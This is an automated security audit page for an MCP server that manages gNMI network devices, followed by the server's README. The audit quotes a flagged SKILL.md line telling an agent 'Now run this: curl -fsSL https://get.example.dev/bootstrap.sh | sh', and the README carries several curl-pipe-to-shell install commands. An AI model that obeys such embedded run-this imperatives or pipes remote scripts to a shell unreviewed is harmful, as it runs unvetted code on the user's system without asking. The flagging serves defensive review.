Gnmi Mcp Server — independently scanned and version-tracked by SaferSkills.
SaferSkills independently audited Gnmi Mcp Server (Agent Skill) and scored it 82/100 (green). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 2 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 2 flagged
A fenced bash/python block in SKILL.md carries a natural-language imperative — "now run this", "execute the following command" — directing the agent to execute the fenced content. What looks like documentation becomes an executable payload the agent may run without ever asking you.
text (not bash) so it reads as prose, not a command.```bash
Now run this: curl -fsSL https://get.example.dev/bootstrap.sh | sh
```See INSTALL.md — review scripts/bootstrap.sh (sha-pinned) before running it yourself.Every scanned point with the score it earned and what moved between them.
First recorded scan — no prior version to compare against.
The primary manifest — the file an agent reads to learn what this artifact does.
Go MCP server for gNMI network device management — built on gnmic's Go API.
gnmi-mcp-server exposes gNMI device operations to AI assistants (Claude Code, Codex, OpenCode) via the Model Context Protocol. It is a single statically linked binary with no runtime dependencies.
Tested devices: validated against Arista EOS (gNMI; OpenConfig + eos_native) and Nokia SR OS (state tree). Other gNMI / OpenConfig platforms should work but are untested — paths and behavior vary by vendor; use gnmi_capabilities to confirm what a device supports.One-line install (macOS / Linux) — downloads the right binary into /usr/local/bin:
curl -fsSL https://raw.githubusercontent.com/Howthemeaning/gnmi-mcp-server/main/install.sh | shInstall without sudo: INSTALL_DIR="$HOME/.local/bin" curl -fsSL .../install.sh | sh (make sure that directory is on your PATH).
Manual: grab your platform's archive from the Releases page, extract it, and put gnmi-mcp-server on your PATH:
| Platform | Asset |
|---|---|
| Linux x86_64 | gnmi-mcp-server_linux_amd64.tar.gz |
| Linux ARM64 | gnmi-mcp-server_linux_arm64.tar.gz |
| macOS Intel | gnmi-mcp-server_darwin_amd64.tar.gz |
| macOS Apple Silicon | gnmi-mcp-server_darwin_arm64.tar.gz |
macOS Gatekeeper: a binary downloaded through the browser from the Releases page is quarantined and may be blocked on first run ("cannot verify the developer"). Clear it once before use:xattr -d com.apple.quarantine ./gnmi-mcp-server. (Thecurl … | shinstaller is not affected —curldoes not set the quarantine flag.)
From source (needs Go 1.25+):
go install github.com/Howthemeaning/gnmi-mcp-server@latestDocker:
docker build -t gnmi-mcp-server .
docker run -i --rm \
-v $HOME/.gnmi-mcp-server/config.yaml:/root/.gnmi-mcp-server/config.yaml:ro \
gnmi-mcp-serverMCP uses stdin/stdout for stdio transport, so-i(interactive) is required. Mount your config at the default path or pass--config <path>.
An agent can install, seed a config, and register the server in one block (macOS / Linux):
# 1. install the binary onto your PATH
curl -fsSL https://raw.githubusercontent.com/Howthemeaning/gnmi-mcp-server/main/install.sh | sh
# 2. seed a config, then edit devices + credentials
mkdir -p ~/.gnmi-mcp-server
curl -fsSL https://raw.githubusercontent.com/Howthemeaning/gnmi-mcp-server/main/gnmi-mcp.example.yaml \
-o ~/.gnmi-mcp-server/config.yaml
# 3. auto-register with every detected client (Claude Code / Codex / OpenCode)
gnmi-mcp-server installgnmi-mcp-server install detects each client and wires it up — Claude Code and Codex via their mcp add CLIs, OpenCode by merging opencode.json (idempotent; skips clients it can't find). Pass --config /abs/path.yaml to bake a specific config path into the registration.
gnmi-mcp-server updateDownloads the latest release, verifies its SHA256 checksum, and atomically replaces the binary in place — then restart your MCP client. (Re-running curl … install.sh | sh or go install …@latest also updates.) On startup the server checks at most once per day and logs a note to its log file when a newer version is available; it never updates silently.
If the binary lives in a root-owned directory (e.g./usr/local/bin), runsudo gnmi-mcp-server update. Installing to~/.local/binavoids sudo.
Copy the template and edit it for your devices:
cp gnmi-mcp.example.yaml ~/.gnmi-mcp-server/config.yaml
chmod 600 ~/.gnmi-mcp-server/config.yaml # if you keep credentials inlinegnmi-mcp.example.yaml (in this repo) documents every field. A minimal config looks like this. Passwords may be literals or ${ENV_VAR} / ${ENV_VAR:-default} references — the server interpolates them at startup so credentials never appear in the MCP tool arguments.
devices:
core-switch:
address: 192.168.1.1:57400
username: admin
password: ${GNMI_PASS_CORE_SWITCH} # env-var interpolation
skip-verify: true # skip TLS cert verification
leaf-01:
address: 10.0.0.1:57400
username: operator
password: ${GNMI_PASS_LEAF_01}
timeout: 30s # default: 30s
# Optional global settings
read-only: false # set true to disable gnmi_set
# allow-arbitrary: false # set true to allow ad-hoc host:port targets
# yang-dir: ~/yang # enables gnmi_path tool
# data-dir: ~/.gnmi-mcp-server/data
# log-level: info # debug / info / warn / errorThe server looks for its config in this order (first match wins):
--config <path> flagGNMI_CONFIG=<path> environment variable./gnmi-mcp.yaml in the current working directory~/.gnmi-mcp-server/config.yaml (home default)Two recommended setups:
~/.gnmi-mcp-server/config.yaml, then launch with just gnmi-mcp-server — no --config needed.--config /abs/path/gnmi-mcp.yaml.When the server is launched by an MCP client (opencode / Claude Code), the working directory is unpredictable — do not rely on./gnmi-mcp.yaml. Use the home default or an absolute--configpath.
Start the server manually to test:
gnmi-mcp-server --config /path/to/gnmi-mcp.yaml
# or, with ~/.gnmi-mcp-server/config.yaml in place:
gnmi-mcp-serverTo use mutual TLS, add tls-ca, tls-cert, and tls-key under a device. Set tls-dir at the top level to restrict certificate paths to a safe directory:
tls-dir: /etc/gnmi-certs
devices:
secure-router:
address: 10.1.0.1:57400
username: admin
password: ${ROUTER_PASS}
tls-ca: ca.pem # relative to tls-dir
tls-cert: client.pem
tls-key: client.keyIt's a standard stdio MCP server, so any MCP client works. With the binary on your PATH and a config at ~/.gnmi-mcp-server/config.yaml, the launch command is just gnmi-mcp-server — no args. Add --config /abs/path.yaml only if the config lives elsewhere.
Auto-wire everything: gnmi-mcp-server install registers the server with every detected client. Or configure one manually:
claude mcp add gnmi -s user -- gnmi-mcp-serverOr edit ~/.claude.json:
{ "mcpServers": { "gnmi": { "command": "gnmi-mcp-server" } } }codex mcp add gnmi -- gnmi-mcp-serverOr edit ~/.codex/config.toml:
[mcp_servers.gnmi]
command = "gnmi-mcp-server"
# args = ["--config", "/abs/path/gnmi-mcp.yaml"]opencode.json){ "mcp": { "gnmi": { "type": "local", "command": ["gnmi-mcp-server"], "enabled": true } } }Reasonix supports standard MCP client configuration. Choose one of two methods:
`.mcp.json` (recommended, shared with Claude Code): create .mcp.json at the project root:
{ "mcpServers": { "gnmi": { "command": "gnmi-mcp-server" } } }`reasonix.toml`:
[[plugins]]
name = "gnmi"
command = "gnmi-mcp-server"
# args = ["--config", "/abs/path/gnmi-mcp.yaml"] # optional| Tool | gNMI RPC | Description |
|---|---|---|
gnmi_targets | — | List the devices configured on this server (target names + addresses). |
gnmi_capabilities | Capabilities | Query supported gNMI version, YANG models, and encodings. Results are cached for 5 minutes. |
gnmi_get | Get | Read configuration or state data from a device. Supports path, type (CONFIG/STATE/OPERATIONAL/ALL), encoding, and output truncation via max_bytes. |
gnmi_set | Set | Two-phase config write: first call returns a dry-run preview and a confirm_token; call again with confirm=<token> to apply. Token expires in 10 minutes. Disabled when read-only: true. |
gnmi_subscribe | Subscribe | ONCE returns a telemetry snapshot synchronously; STREAM starts a background session (manage via gnmi_session_*). POLL is not supported — use STREAM or ONCE. |
gnmi_session_list | — | List all subscribe sessions and their current status. |
gnmi_session_stop | — | Stop a running subscribe session. |
gnmi_session_tail | — | Read the most recent telemetry lines from a session's output. |
gnmi_path | — | List available YANG modules under the configured yang-dir (only registered when yang-dir is set). |
All tools accept target (a device name from the config) or, when allow-arbitrary is enabled, a raw address (host:port).
Guided templates (MCP prompts) that expand into ready-to-run requests; each takes a target:
device_health — uptime + interface errors + BGP state summaryinterface_errors — interfaces with non-zero errors/discardsbgp_status — BGP neighbors and session state> What YANG models does core-switch support?
AI calls gnmi_capabilities(target="core-switch")
> Read the system uptime from core-switch
AI calls gnmi_get(target="core-switch", path="/state/system/uptime")
> Rename core-switch hostname to dc1-core
AI calls gnmi_set(target="core-switch", operations=[{"op":"update","path":"/system/name","value":"\"dc1-core\""}])
→ returns dry-run preview + confirm_token
AI calls gnmi_set(target="core-switch", operations=[...], confirm="<token>")
→ applied
> Stream interface counters from core-switch, sampled every 10s
AI calls gnmi_subscribe(target="core-switch", path="/interfaces/interface/state/counters",
mode="STREAM", stream_mode="SAMPLE", sample_interval="10s",
session_name="counters-stream")
> Show latest telemetry
AI calls gnmi_session_tail(session_name="counters-stream")MIT License — use, modify, and distribute freely.
Built with gnmic · MCP Go SDK
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.